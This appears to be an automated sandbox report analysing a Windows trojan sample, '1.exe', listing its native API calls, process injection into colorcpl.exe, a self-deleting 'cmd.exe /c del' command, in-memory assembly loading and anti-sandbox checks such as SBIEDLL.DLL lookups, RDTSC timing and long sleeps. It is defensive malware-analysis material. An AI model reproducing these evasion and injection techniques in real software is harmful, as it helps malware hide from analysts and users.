Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04ECD800 4_2_04ECD800
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E69950 4_2_04E69950
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E7B950 4_2_04E7B950
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04EF5910 4_2_04EF5910
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F0DAC6 4_2_04F0DAC6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04EFDAAC 4_2_04EFDAAC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04EA5AA0 4_2_04EA5AA0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F01AA3 4_2_04F01AA3
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04ED3A6C 4_2_04ED3A6C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F17A46 4_2_04F17A46
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F1FA49 4_2_04F1FA49
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E9DBF9 4_2_04E9DBF9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04ED5BF0 4_2_04ED5BF0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E7FB80 4_2_04E7FB80
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F1FB76 4_2_04F1FB76
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E3C5E0 4_2_02E3C5E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E22FB0 4_2_02E22FB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E28C4B 4_2_02E28C4B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E28C50 4_2_02E28C50
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E22D90 4_2_02E22D90
Source: C:\Users\user\Desktop\1.exe Code function: String function: 017AF290 appears 105 times
Source: C:\Users\user\Desktop\1.exe Code function: String function: 01777E54 appears 111 times
Source: C:\Users\user\Desktop\1.exe Code function: String function: 0179EA12 appears 86 times
Source: C:\Users\user\Desktop\1.exe Code function: String function: 0171B970 appears 280 times
Source: C:\Users\user\Desktop\1.exe Code function: String function: 01765130 appears 58 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 04E95130 appears 58 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 04EDF290 appears 105 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 04EA7E54 appears 111 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 04ECEA12 appears 86 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 04E4B970 appears 280 times
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_004181B0 NtCreateFile, 2_2_004181B0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_00418260 NtReadFile, 2_2_00418260
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_004182E0 NtClose, 2_2_004182E0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_00418390 NtAllocateVirtualMemory, 2_2_00418390
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_004181AB NtCreateFile, 2_2_004181AB
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0041838A NtAllocateVirtualMemory, 2_2_0041838A
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762B60 NtClose,LdrInitializeThunk, 2_2_01762B60
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_01762BF0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762AD0 NtReadFile,LdrInitializeThunk, 2_2_01762AD0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762D30 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_01762D30
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762D10 NtMapViewOfSection,LdrInitializeThunk, 2_2_01762D10
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762DF0 NtQuerySystemInformation,LdrInitializeThunk, 2_2_01762DF0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762DD0 NtDelayExecution,LdrInitializeThunk, 2_2_01762DD0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762C70 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_01762C70
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762CA0 NtQueryInformationToken,LdrInitializeThunk, 2_2_01762CA0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762F30 NtCreateSection,LdrInitializeThunk, 2_2_01762F30
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762FE0 NtCreateFile,LdrInitializeThunk, 2_2_01762FE0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762FB0 NtResumeThread,LdrInitializeThunk, 2_2_01762FB0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762F90 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_01762F90
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_01762EA0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762E80 NtReadVirtualMemory,LdrInitializeThunk, 2_2_01762E80
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017635C0 NtCreateMutant,LdrInitializeThunk, 2_2_017635C0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01764340 NtSetContextThread, 2_2_01764340
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01764650 NtSuspendThread, 2_2_01764650
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762BE0 NtQueryValueKey, 2_2_01762BE0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762BA0 NtEnumerateValueKey, 2_2_01762BA0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762B80 NtQueryInformationFile, 2_2_01762B80
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762AF0 NtWriteFile, 2_2_01762AF0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762AB0 NtWaitForSingleObject, 2_2_01762AB0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762D00 NtSetInformationFile, 2_2_01762D00
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762DB0 NtEnumerateKey, 2_2_01762DB0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762C60 NtCreateKey, 2_2_01762C60
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762C00 NtQueryInformationProcess, 2_2_01762C00
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762CF0 NtOpenProcess, 2_2_01762CF0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762CC0 NtQueryVirtualMemory, 2_2_01762CC0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762F60 NtCreateProcessEx, 2_2_01762F60
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762FA0 NtQuerySection, 2_2_01762FA0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762E30 NtWriteVirtualMemory, 2_2_01762E30
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762EE0 NtQueueApcThread, 2_2_01762EE0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01763010 NtOpenDirectoryObject, 2_2_01763010
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01763090 NtSetValueKey, 2_2_01763090
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017639B0 NtGetContextThread, 2_2_017639B0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01763D70 NtOpenThread, 2_2_01763D70
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01763D10 NtOpenProcessToken, 2_2_01763D10
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92CA0 NtQueryInformationToken,LdrInitializeThunk, 4_2_04E92CA0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92C60 NtCreateKey,LdrInitializeThunk, 4_2_04E92C60
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92C70 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_04E92C70
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92DF0 NtQuerySystemInformation,LdrInitializeThunk, 4_2_04E92DF0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92DD0 NtDelayExecution,LdrInitializeThunk, 4_2_04E92DD0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92D10 NtMapViewOfSection,LdrInitializeThunk, 4_2_04E92D10
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 4_2_04E92EA0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92FE0 NtCreateFile,LdrInitializeThunk, 4_2_04E92FE0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92F30 NtCreateSection,LdrInitializeThunk, 4_2_04E92F30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92AD0 NtReadFile,LdrInitializeThunk, 4_2_04E92AD0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92BE0 NtQueryValueKey,LdrInitializeThunk, 4_2_04E92BE0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 4_2_04E92BF0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92B60 NtClose,LdrInitializeThunk, 4_2_04E92B60
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E935C0 NtCreateMutant,LdrInitializeThunk, 4_2_04E935C0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E94650 NtSuspendThread, 4_2_04E94650
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E94340 NtSetContextThread, 4_2_04E94340
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92CF0 NtOpenProcess, 4_2_04E92CF0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92CC0 NtQueryVirtualMemory, 4_2_04E92CC0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92C00 NtQueryInformationProcess, 4_2_04E92C00
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92DB0 NtEnumerateKey, 4_2_04E92DB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92D30 NtUnmapViewOfSection, 4_2_04E92D30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92D00 NtSetInformationFile, 4_2_04E92D00
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92EE0 NtQueueApcThread, 4_2_04E92EE0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92E80 NtReadVirtualMemory, 4_2_04E92E80
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92E30 NtWriteVirtualMemory, 4_2_04E92E30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92FA0 NtQuerySection, 4_2_04E92FA0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92FB0 NtResumeThread, 4_2_04E92FB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92F90 NtProtectVirtualMemory, 4_2_04E92F90
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92F60 NtCreateProcessEx, 4_2_04E92F60
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92AF0 NtWriteFile, 4_2_04E92AF0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92AB0 NtWaitForSingleObject, 4_2_04E92AB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92BA0 NtEnumerateValueKey, 4_2_04E92BA0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92B80 NtQueryInformationFile, 4_2_04E92B80
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E93090 NtSetValueKey, 4_2_04E93090
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E93010 NtOpenDirectoryObject, 4_2_04E93010
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E93D70 NtOpenThread, 4_2_04E93D70
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E93D10 NtOpenProcessToken, 4_2_04E93D10
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E939B0 NtGetContextThread, 4_2_04E939B0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E382E0 NtClose, 4_2_02E382E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E38260 NtReadFile, 4_2_02E38260
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E38390 NtAllocateVirtualMemory, 4_2_02E38390
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E381B0 NtCreateFile, 4_2_02E381B0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E3838A NtAllocateVirtualMemory, 4_2_02E3838A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E381AB NtCreateFile, 4_2_02E381AB
Source: 1.exe, 00000000.00000002.2054404991.0000000046E00000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameGlaxoSmithKline.dll@ vs 1.exe
Source: 1.exe, 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameGlaxoSmithKline.dll@ vs 1.exe
Source: 1.exe, 00000000.00000000.1985024133.0000000000992000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameDuplicateWaitObjectException.exe< vs 1.exe
Source: 1.exe, 00000000.00000002.2038213764.0000000026A00000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameNT1.dll, vs 1.exe
Source: 1.exe, 00000000.00000002.2024194329.0000000006021000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNT1.dll, vs 1.exe
Source: 1.exe, 00000000.00000002.2019687463.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs 1.exe
Source: 1.exe, 00000002.00000002.2046273682.0000000001297000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamecolorcpl.exej% vs 1.exe
Source: 1.exe, 00000002.00000002.2046399747.0000000001523000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamecolorcpl.exej% vs 1.exe
Source: 1.exe, 00000002.00000002.2046479384.000000000181D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 1.exe
Source: 1.exe Binary or memory string: OriginalFilenameDuplicateWaitObjectException.exe< vs 1.exe
Source: 1.exe ReversingLabs: Detection: 92%
Source: 1.exe Virustotal: Detection: 82%
Source: C:\Users\user\Desktop\1.exe File read: C:\Users\user\Desktop\1.exe:Zone.Identifier
Source: 1.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\1.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\1.exe C:\Users\user\Desktop\1.exe
Source: C:\Users\user\Desktop\1.exe Process created: C:\Users\user\Desktop\1.exe C:\Users\user\Desktop\1.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\1.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1.exe Process created: C:\Users\user\Desktop\1.exe C:\Users\user\Desktop\1.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\1.exe"
Source: C:\Users\user\Desktop\1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1.exe.log
Source: classification engine Classification label: mal100.troj.evad.winEXE@303/1@37/4
Source: 0.2.1.exe.46e00000.8.raw.unpack, ContextConfigurationAdapter.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.1.exe.46e00000.8.raw.unpack, ContextConfigurationAdapter.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.1.exe.46e00000.8.raw.unpack, ContextConfigurationAdapter.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.1.exe.4009280.3.raw.unpack, ContextConfigurationAdapter.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.1.exe.4009280.3.raw.unpack, ContextConfigurationAdapter.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.1.exe.4009280.3.raw.unpack, ContextConfigurationAdapter.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, ContextConfigurationAdapter.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, ContextConfigurationAdapter.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, ContextConfigurationAdapter.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 1.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\1.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Users\user\Desktop\1.exe Mutant created: \Sessions\1\BaseNamedObjects\LtuPWOmKmRtPgVVETlqTXm
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3948:120:WilError_03
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, Callback.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, Callback.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1.exe.46e00000.8.raw.unpack, Callback.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1.exe.46e00000.8.raw.unpack, Callback.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1.exe.4009280.3.raw.unpack, Callback.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1.exe.4009280.3.raw.unpack, Callback.cs Cryptographic APIs: 'CreateDecryptor'
Source: C:\Users\user\Desktop\1.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: 1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 1.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: colorcpl.pdbGCTL source: 1.exe, 00000002.00000002.2046399747.0000000001520000.00000040.10000000.00040000.00000000.sdmp, 1.exe, 00000002.00000002.2046273682.0000000001297000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449033353.0000000000E00000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: colorcpl.pdb source: 1.exe, 00000002.00000002.2046399747.0000000001520000.00000040.10000000.00040000.00000000.sdmp, 1.exe, 00000002.00000002.2046273682.0000000001297000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449033353.0000000000E00000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: 1.exe, 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000003.2047949861.0000000004C70000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000003.2045475462.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: 1.exe, 1.exe, 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000004.00000003.2047949861.0000000004C70000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000003.2045475462.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmp

Data Obfuscation

Source: 1.exe, SwitchValueState.cs .Net Code: CspKeyContainerInfo System.AppDomain.Load(byte[])
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, ContextConfigurationAdapter.cs .Net Code: CustomizeParams System.Reflection.Assembly.Load(byte[])
Source: 0.2.1.exe.46e00000.8.raw.unpack, ContextConfigurationAdapter.cs .Net Code: CustomizeParams System.Reflection.Assembly.Load(byte[])
Source: 0.2.1.exe.4009280.3.raw.unpack, ContextConfigurationAdapter.cs .Net Code: CustomizeParams System.Reflection.Assembly.Load(byte[])
Source: 3.2.explorer.exe.111b7960.0.raw.unpack, SwitchValueState.cs .Net Code: CspKeyContainerInfo System.AppDomain.Load(byte[])
Source: 4.2.colorcpl.exe.5377960.3.raw.unpack, SwitchValueState.cs .Net Code: CspKeyContainerInfo System.AppDomain.Load(byte[])
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, Callback.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.1.exe.46e00000.8.raw.unpack, Callback.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.1.exe.4009280.3.raw.unpack, Callback.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: C:\Users\user\Desktop\1.exe Code function: 0_2_02C8E7C2 push eax; ret 0_2_02C8E7C9
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0041D121 push ds; ret 2_2_0041D137
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_00416290 push ds; iretd 2_2_00416291
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0041B3F2 push eax; ret 2_2_0041B3F8
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0041B3FB push eax; ret 2_2_0041B462
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0041B3A5 push eax; ret 2_2_0041B3F8
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_00415BBB push es; retf 2_2_00415C36
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0041B45C push eax; ret 2_2_0041B462
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_016F225F pushad ; ret 2_2_016F27F9
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_016F27FA pushad ; ret 2_2_016F27F9
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017209AD push ecx; mov dword ptr [esp], ecx 2_2_017209B6
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_016F283D push eax; iretd 2_2_016F2858
Source: C:\Windows\explorer.exe Code function: 3_2_103F60DE push edi; retf 3_2_103F60DF
Source: C:\Windows\explorer.exe Code function: 3_2_109820DE push edi; retf 3_2_109820DF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E227FA pushad ; ret 4_2_04E227F9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E2225F pushad ; ret 4_2_04E227F9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E2283D push eax; iretd 4_2_04E22858
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E509AD push ecx; mov dword ptr [esp], ecx 4_2_04E509B6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E36290 push ds; iretd 4_2_02E36291
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E3B3F2 push eax; ret 4_2_02E3B3F8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E3B3FB push eax; ret 4_2_02E3B462
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E3B3A5 push eax; ret 4_2_02E3B3F8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E3D121 push ds; ret 4_2_02E3D137
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E3B45C push eax; ret 4_2_02E3B462
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E35BBB push es; retf 4_2_02E35C36
Source: initial sample Static PE information: section name: .text entropy: 6.8175261260266655
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\colorcpl.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: 00000000.00000002.2021348011.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 1.exe PID: 1892, type: MEMORYSTR
Source: 1.exe, 00000000.00000002.2021348011.0000000002E71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: 1.exe, 00000000.00000002.2021348011.0000000002E71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Source: C:\Users\user\Desktop\1.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1.exe RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 0000000002E285E4 second address: 0000000002E285EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 0000000002E2896E second address: 0000000002E28974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1.exe TID: 6108 Thread sleep time: -51118s >= -30000s
Source: C:\Users\user\Desktop\1.exe TID: 1396 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 5020 Thread sleep time: -50000s >= -30000s
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6564 Thread sleep count: 140 > 30
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6564 Thread sleep time: -280000s >= -30000s
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6564 Thread sleep count: 9832 > 30
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6564 Thread sleep time: -19664000s >= -30000s
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\colorcpl.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_004088A0 rdtsc 2_2_004088A0
Source: C:\Users\user\Desktop\1.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 886
Source: C:\Windows\SysWOW64\colorcpl.exe Window / User API: threadDelayed 9832
Source: C:\Users\user\Desktop\1.exe API coverage: 1.7 %
Source: C:\Windows\SysWOW64\colorcpl.exe API coverage: 1.8 %
Source: C:\Users\user\Desktop\1.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\1.exe Thread delayed: delay time: 51118
Source: C:\Users\user\Desktop\1.exe Thread delayed: delay time: 922337203685477
